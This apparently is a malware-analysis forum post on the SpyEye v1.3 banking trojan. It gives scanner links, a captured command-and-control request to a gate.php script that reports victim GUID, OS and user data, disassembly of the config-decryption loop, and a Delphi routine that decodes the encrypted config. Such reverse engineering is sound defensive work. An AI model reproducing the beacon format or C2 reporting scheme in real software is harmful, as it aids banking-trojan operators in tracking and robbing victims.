http://camas.comodo.com/cgi-bin/submit? ... 4d92195095
http://www.virustotal.com/file-scan/rep ... 1298660191
http://www.virustotal.com/file-scan/rep ... 1298660191
markusg wrote: http://virusscan.jotti.org/de/scanresul ... 6bab0f122a
SpyEye v1.3
mafsupport.com GET /~brbrabr/gate.php?guid=5.1.2600!FUCKTHAT!D06F0742&ver=10310&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&ccrc=6BBA1CA6&md5=c1d4ff03593201296531783c9b13936f&plg=customconnector&stat=online HTTP/1.1
Omfg! Process is still active? Let's kill that mazafaka! :)
type
  { Byte-indexing overlay for a raw heap block: a PBYTEBUF is dereferenced
    as buf[i] for any offset i, well past the declared 0..0 bounds, so this
    only works with range checking ($R) turned off. }
  PBYTEBUF = ^BYTEBUF;
  BYTEBUF = array[0..0] of BYTE;
{
0091030E SpyEye_DecryptCycle:
0091030E mov dl, [eax+ecx]
00910311 xor dl, 4Ch
00910314 sub dl, [eax+ecx-1]
00910318 mov [eax+ecx], dl
0091031B dec eax
0091031C test eax, eax
0091031E jg short SpyEye_DecryptCycle
}
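{ Decodes a SpyEye v1.3 configuration file (lpConfigName) and writes the
  plaintext to 'decrypted.zip' in the current directory.

  Scheme (mirrors SpyEye_DecryptCycle above): walking from the last byte
  down to index 1, each byte is XORed with $4C and then the still-encoded
  previous byte is subtracted from it.  Going backwards is what keeps
  buf[i-1] untouched until buf[i] has consumed it; byte 0 is left as-is.

  Failure handling is best-effort and silent: an unopenable input, an
  undeterminable size, an allocation failure, a short read or an
  unopenable output all make the routine return without writing a file.
  The input is untrusted (it comes from an infected host), so its size and
  the number of bytes actually read are validated before the buffer is
  walked. }
procedure SpyEyeDecodeConfig(lpConfigName: PWideChar);
var
  hInput, hOutput: THANDLE;
  fsize, bytesIO: DWORD;
  i: integer;
  c: byte;
  buf: PBYTEBUF;
begin
  hInput := CreateFileW(lpConfigName, GENERIC_READ, 0, nil, OPEN_EXISTING, 0, 0);
  if (hInput = INVALID_HANDLE_VALUE) then
    Exit;
  try
    fsize := GetFileSize(hInput, nil);
    { INVALID_FILE_SIZE ($FFFFFFFF) would make fsize + 1 wrap to 0 and the
      read below overrun a zero-length block. }
    if (fsize = INVALID_FILE_SIZE) then
      Exit;
    { LPTR zero-fills; the extra byte keeps buf[fsize] inside the block,
      because the loop's first iteration reads and writes it. }
    buf := pointer(LocalAlloc(LPTR, fsize + 1));
    if (buf = nil) then
      Exit;
    try
      bytesIO := 0;
      _ReadFile(hInput, buf, fsize, @bytesIO, nil);
      { A failed or short read leaves zero padding that would decode to
        garbage; only a complete read is worth decoding. }
      if (bytesIO <> fsize) then
        Exit;
      { Walk backwards so buf[i - 1] is still ciphertext when consumed.
        i = fsize touches the zero pad byte: it is inside the allocation
        and is never written out, so that extra iteration is harmless. }
      for i := fsize downto 1 do
      begin
        c := buf[i] xor $4C;
        { Intended to wrap mod 256; like the buf[] indexing, this relies on
          range checking being off. }
        c := c - buf[i - 1];
        buf[i] := c;
      end;
      hOutput := CreateFileW('decrypted.zip', GENERIC_WRITE, 0, nil, CREATE_ALWAYS, 0, 0);
      if (hOutput <> INVALID_HANDLE_VALUE) then
      begin
        _WriteFile(hOutput, buf, fsize, @bytesIO, nil);
        CloseHandle(hOutput);
      end;
    finally
      LocalFree(HLOCAL(buf));
    end;
  finally
    CloseHandle(hInput);
  end;
end;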
C:\Data\Documents\My Projects\CC\CardNet\Progs\Client\SpyEye\plugins\BC\Client\Release\socks5.pdb